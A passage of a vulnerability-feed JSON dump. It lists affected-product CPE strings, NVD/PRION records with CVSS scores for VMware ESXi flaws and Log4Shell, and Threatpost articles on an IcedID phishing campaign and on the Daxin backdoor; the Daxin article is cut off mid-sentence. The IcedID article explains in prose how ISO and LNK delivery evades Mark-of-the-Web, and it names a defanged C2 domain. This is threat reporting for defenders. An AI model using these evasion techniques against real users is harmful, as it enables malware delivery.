"cpe:2.3:a:intel:secure_device_onboard:-:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:enterprise_chat_and_email:12.6\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:solid_edge_harness_design:2020:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cloudcenter_suite:5.5\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\$1c\$:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siveillance_identity:1.6:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_data_gateway:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_network_automation:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_manager:-:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siguard_dsa:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cloudcenter_suite:4.10\$0.15\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.001.000:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:6.5.0:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:6.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cx_cloud_agent:001.012:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:006.004.000.003:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\$1g\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.009\$000.000\$:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_info_center:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.4\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:002.006\$000.156\$:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\$1e\$:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:spectrum_power_7:2.30:sp2:*:*:*:*:*:*", "cpe:2.3:a:cisco:video_surveillance_manager:7.14\$1.26\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_services_orchestrator:-:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:mendix:*:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:solid_edge_harness_design:2020:sp2002:*:*:*:*:*:*", "cpe:2.3:a:siemens:xpedition_enterprise:-:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:sppa-t3000_ses3000_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:sipass_integrated:2.85:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:solid_edge_harness_design:2020:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:prime_service_catalog:12.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_service_pack_2:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_optimization_engine:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:iot_operations_dashboard:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:6.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siguard_dsa:4.4:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:6.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_mobile_experiences:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager_im_\\&_presence_service:11.5\$1.22900.6\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:enterprise_chat_and_email:12.5\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.001.001:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_intelligence_center:12.6\$1\$:-:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release2:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:energyip:8.5:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:linux:*:*", "cpe:2.3:a:cisco:video_surveillance_manager:7.14\$3.025\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:4.0:maintenance_release3:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_platform_infrastructure:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:emergency_responder:11.5\$4.66000.14\$:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siveillance_command:4.16.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.6\$1\$:es03:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:12.5:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*", "cpe:2.3:a:siemens:siveillance_vantage:*:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:6.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.6\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.000.001:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:sentron_powermanager:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.003:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:captial:2019.1:sp1912:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_network_automation:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:002.004\$000.914\$:-:*:*:*:*:*:*", "cpe:2.3:a:intel:system_studio:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:dna_spaces_connector:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.5\$1\$:su2:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.6\$2\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\$3\$:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siveillance_identity:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_security_patch4:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:6.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.2\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.3\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\$1d\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.5\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:mobility_services_engine:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:vesys:2019.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.009\$001.002\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_zero_touch_provisioning:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:fog_director:-:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:nx:*:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:spectrum_power_4:4.70:sp8:*:*:*:*:*:*", "cpe:2.3:a:siemens:operation_scheduler:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:2.4.0:-:*:*:*:*:*:*", "cpe:2.3:a:siemens:vesys:2019.1:sp1912:*:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.5:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.6\$1\$:es01:*:*:*:*:*:*", "cpe:2.3:a:cisco:enterprise_chat_and_email:12.0\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:dna_center:2.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:percussion:rhythmyx:7.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:dna_spaces:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:7.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:smart_phy:3.1.3:*:*:*:*:*:*:*"]}], "prion": [{"lastseen": "2023-11-22T00:36:05", "description": "ESXi contains a slow HTTP POST denial-of-service vulnerability in rhttpproxy. A malicious actor with network access to ESXi may exploit this issue to create a denial-of-service condition by overwhelming rhttpproxy service with multiple requests.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-16T17:15:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22050"], "modified": "2022-02-25T17:57:00", "id": "PRION:CVE-2021-22050", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-22050", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-11-22T00:36:05", "description": "VMware ESXi, Workstation, and Fusion contain a use-after-free vulnerability in the XHCI USB controller. A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host.", "cvss3": {"exploitabilityScore": 0.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.7, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T17:15:00", "type": "prion", "title": "Double free", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22040"], "modified": "2022-02-24T19:43:00", "id": "PRION:CVE-2021-22040", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-22040", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T00:36:04", "description": "VMware ESXi contains an unauthorized access vulnerability due to VMX having access to settingsd authorization tickets. A malicious actor with privileges within the VMX process only, may be able to access settingsd service running as a high privileged user.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T17:15:00", "type": "prion", "title": "Improper access control", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22042"], "modified": "2022-02-25T18:07:00", "id": "PRION:CVE-2021-22042", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-22042", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T00:36:06", "description": "VMware ESXi, Workstation, and Fusion contain a double-fetch vulnerability in the UHCI USB controller. A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host.", "cvss3": {"exploitabilityScore": 0.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.7, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T17:15:00", "type": "prion", "title": "Double free", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22041"], "modified": "2022-02-24T19:50:00", "id": "PRION:CVE-2021-22041", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-22041", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T00:36:06", "description": "VMware ESXi contains a TOCTOU (Time-of-check Time-of-use) vulnerability that exists in the way temporary files are handled. A malicious actor with access to settingsd, may exploit this issue to escalate their privileges by writing arbitrary files.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T17:15:00", "type": "prion", "title": "Code injection", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22043"], "modified": "2022-02-24T19:51:00", "id": "PRION:CVE-2021-22043", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-22043", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T01:07:03", "description": "Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-10T10:15:00", "type": "prion", "title": "Default configuration", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-04-03T20:15:00", "id": "PRION:CVE-2021-44228", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-44228", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2022-03-29T14:30:43", "description": "The ever-evolving [banking trojan IcedID](<https://threatpost.com/icedid-web-forms-google-urls/165347/>) is back again with a phishing campaign that uses previously compromised Microsoft Exchange servers to send emails that appear to come from legitimate accounts. Attackers also are using stealthy new payload-delivery tactics to spread the modular malware.\n\nResearchers from [Intezer](<https://www.intezer.com/>) earlier this month uncovered the campaign, which employs thread hijacking to send malicious messages from stolen Exchange accounts, thus adding an extra level of evasion to the campaign\u2019s malicious intent, wrote researchers [Joakim Kennedy](<https://www.intezer.com/author/jkennedy/>) and [Ryan Robinson](<https://www.intezer.com/author/ryanrobinson/>) [in a blog post](<https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/>) published Monday.\n\nThe actors behind IcedID \u2013 as well as other spearphishers \u2013 have previously used phishing emails that \u201creuse previously stolen emails to make the lure more convincing,\u201d researchers wrote. However, this time the threat has evolved in a couple of key ways that make it even more dangerous to targets, which include organizations within energy, healthcare, law and pharmaceutical sectors, researchers noted.\n\nNot only is the threat actor now using compromised Microsoft Exchange servers to send the phishing emails from the account that they stole from, but the delivery of the malicious payload also has shifted in a way that can execute malware without the user even knowing, researchers said.\n\n\u201cThe payload has also moved away from using office documents to the use of ISO files with a Windows LNK file and a DLL file,\u201d researchers wrote. \u201cThe use of ISO files allows the threat actor to bypass the [Mark-of-the-Web](<https://attack.mitre.org/techniques/T1553/005/>) controls, resulting in execution of the malware without warning to the user.\u201d\n\nPreviously the infection chain most commonly associated with IcedID phishing campaigns has been an email with an attached password-protected ZIP archive that contains a macro-enabled Office document, which executes the IcedID installer.\n\n## **Breakdown of the Attack Chain**\n\nThe new campaign starts with a phishing email that includes a message about an important document and includes a password-protected ZIP archive file attached, the password for which is included in the email body.\n\nThe email seems extra convincing to users because it uses what\u2019s called \u201cthread hijacking,\u201d in which attackers use a portion of a previous thread from a legitimate email found in the inbox of the stolen account.\n\n\u201cBy using this approach, the email appears more legitimate and is transported through the normal channels which can also include security products,\u201d researchers wrote.\n\nThe majority of the originating Exchange servers that researchers observed in the campaign appear to be unpatched and publicly exposed, \u201cmaking the ProxyShell vector a good theory,\u201d they wrote. [ProxyShell](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) is a remote-code execution (RCE) bug discovered in Exchange Servers last year that has since been patched but has been [throttled by attackers](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>).\n\nOnce unzipped, the attached file includes a single \u201cISO\u201d file with the same file name as the ZIP archive that was created not that long before the email was sent. That ISO file includes two files: a LNK file named \u201cdocument\u201d and a DLL file named \u201cmain,\u201d also prepared relatively recently and potentially used in previous phishing email, researchers said.\n\nWhen a user double clicks the LNK file, it uses \u201cregsvr32\u201d to execute the DLL file, which allows for proxy execution of malicious code in main.dll for defense evasion, they wrote in the post. The DLL file is a loader for the IcedID payload.\n\nThe loader will locate the encrypted payload, which is stored in the resource section of the binary, through the technique API hashing. The resulting hash is then compared with a hardcoded hash, locating the call for FindResourceA, which is dynamically called to fetch the encrypted payload, researchers wrote.\n\nThe ultimate step in the attack chain is that the IcedID \u201cGziploader\u201d payload is decoded and placed in memory and then executed. The GZiploader fingerprints the machine and sends a beacon to the command-and-control (C2) server \u2013 located at yourgroceries[.]top_._ \u2013 with information about the infected host, which then can be used for further nefarious activity.\n\n## **Evolution of a Threat**\n\nResearchers at IBM first discovered IcedID [back in 2017](<https://threatpost.com/new-icedid-trojan-targets-us-banks/128851/>) as a trojan targeting banks, payment card providers, mobile services providers, payroll, web mail and e-commerce sites.\n\nThe malware has [evolved over the years](<https://threatpost.com/botnet-operators-team-up-to-leverage-icedid-trickbot-trojans/132392/>) and already has a storied history of clever obfuscation. For example, it [resurfaced](<https://threatpost.com/icedid-banker-adding-steganography-covid-19-theme/156718/>) during the [COVID-19 campaign](<https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware>) with new functionality that uses steganography \u2013 the practice of hiding code within images to stealthily infect victims \u2013 as well as other enhancements.\n\nThe new campaign is evidence of its [further evolution](<https://threatpost.com/spam-icedid-banking-trojan-variant/167250/>) and could signify that IcedID is indeed becoming, [as many fear](<https://threatpost.com/icedid-banking-trojan-surges-emotet/165314/>), the new [Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) \u2013 a modular threat that began as a trojan but steadily evolved into one of the most dangerous malwares ever seen.\n\n\u201cThis attack shows how much effort attackers put in all the time to evade detection and why defense in depth is necessary,\u201d observed Saumitra Das, CTO and co-founder at security firm [Blue Hexagon](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATURk7nu5DOXPXjQHtUbQPB-2Bo-3Dj4oZ_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8GJOp9iX7pVlW-2BkiIYpN1sif0KFuJYXLhOJYPn-2B9Sn-2Baowev7BWgf7-2Fsft7vhZ-2FleI4B1CtNAbekmGpeBhmEFQ0kWRSkTE0FzXKh-2Bz963fPXZn0hvo6ZGATosJpWWMJIx2kznvRhglY0WQkeZMakpGSSCIz9LKVoA7IXOHVn5P16MOaoTEh1LFaqgv30hL1UfNg9Za-2FKpoEtnwzBDLz4DtQVA3dFYwDxuvZKeD9Y8Hi4WQLnSai8UFna4-2BIEwYtA0NcX5KrsjsbSEnjBzFNfZ-2B0-3D>), in an email to Threatpost.\n\nThis time and effort, in turn, shows a level of sophistication on the part of those behind IcedID in that they have thorough knowledge of contemporary email protections and are continuously adding new tactics as security also grows and evolves, he said.\n\n\u201cMany email security systems use reputation of senders to block malicious email without being able to assess the email itself,\u201d Das noted. \u201cHere, they used compromised Exchange servers to make it through.\u201d\n\nThe group\u2019s use of obfuscated file formats to deliver malware, as well as the final payload\u2019s delivery over the network, also demonstrate that the threat actors know how to evade signature and sandboxes, he added.\n\n\u201cThese attacks often go much deeper than simply stealing data,\u201d concurred Chris Clements, vice president of solutions architecture at security firm [Cerberus Sentinel](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUc1h7F6EeKyqQHDAzxY6FeBG4AZ1lNaZ-2Fme9HKLAKT7PZQLK_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8IRiPIGKWMahkivu0WTh5PX5dG77IJVWKxIQtQJVv-2BIYMmRr5z7OIF8mKih-2F25UI0RQa6-2Bdcn0eyt9a-2F-2BxbdAQ8flodV7haNCcr-2BW1iLqgw0DYt7ntjLmuD7PDGwxwwHSq2gHGWVXVmYGWcDbHq95V0DcFYQggLtmHop2EFskxujGp5A7HFr4-2Bzu8HP-2Fn84dnll5nv7EwsYGa4Z-2BkWEdDcrCAY75JBexQSBfFsv2LbL-2Bn1Qz-2FYzen2NsuzLcfAC1av2zq9EhGfkk9KycL0qVySQ-3D>)**, **in an email to Threatpost. \u201cThe cybercriminals take the time to read through the mailboxes to understand the inter-organization relationships and operating procedures.\n\n\u201cTo protect themselves from similar attacks, it\u2019s critical that organizations ensure that they apply security patches promptly and thoroughly in their environment,\u201d he added. However, what is historically true for patching remains true now: that it\u2019s \u201ca task that\u2019s easier said than done,\u201d Clemens acknowledged.\n\n\u201cIt really takes a cultural approach to cybersecurity to plan for failures in defenses like patch management,\u201d he said.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T14:02:41", "type": "threatpost", "title": "Exchange Servers Speared in IcedID Phishing Campaign", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-29T14:02:41", "id": "THREATPOST:8243943141B8F18343765DA77D33F46C", "href": "https://threatpost.com/exchange-servers-speared-in-icedid-phishing-campaign/179137/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-01T18:09:38", "description": "The Daxin malware is taking aim at hardened government networks around the world, according to researchers, with the goal of cyberespionage.\n\nThe Symantec Threat Hunter team noticed the advanced persistent threat (APT) weapon in action in November, noting that it\u2019s \u201cthe most advanced piece of malware Symantec researchers have seen from [China-linked actors](<https://threatpost.com/victory-backdoor-apt-campaign/166700/>)\u2026exhibiting technical complexity previously unseen by such actors.\u201d\n\nThey added that Daxin\u2019s specific scope of operations includes reading and writing arbitrary files; starting and interacting with arbitrary processes; and advanced lateral movement and stealth capabilities.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) also flagged the activity, which Symantec characterized as \u201clong-running.\u201d The earliest known sample of the malware dates from 2013, when it already had a large part of the codebase fully developed.\n\n\u201cDaxin malware is a highly sophisticated rootkit backdoor with complex, stealthy command-and-control (C2) functionality that enabled remote actors to communicate with secured devices not connected directly to the internet,\u201d warned CISA, in a [Monday alert](<https://www.cisa.gov/uscert/ncas/current-activity/2022/02/28/broadcom-software-discloses-apt-actors-deploying-daxin-malware>). \u201cDaxin appears to be optimized for use against hardened targets, allowing the actors to deeply burrow into targeted networks and exfiltrate data without raising suspicions.\u201d\n\n## **Built for Stealth**\n\nFrom a technical 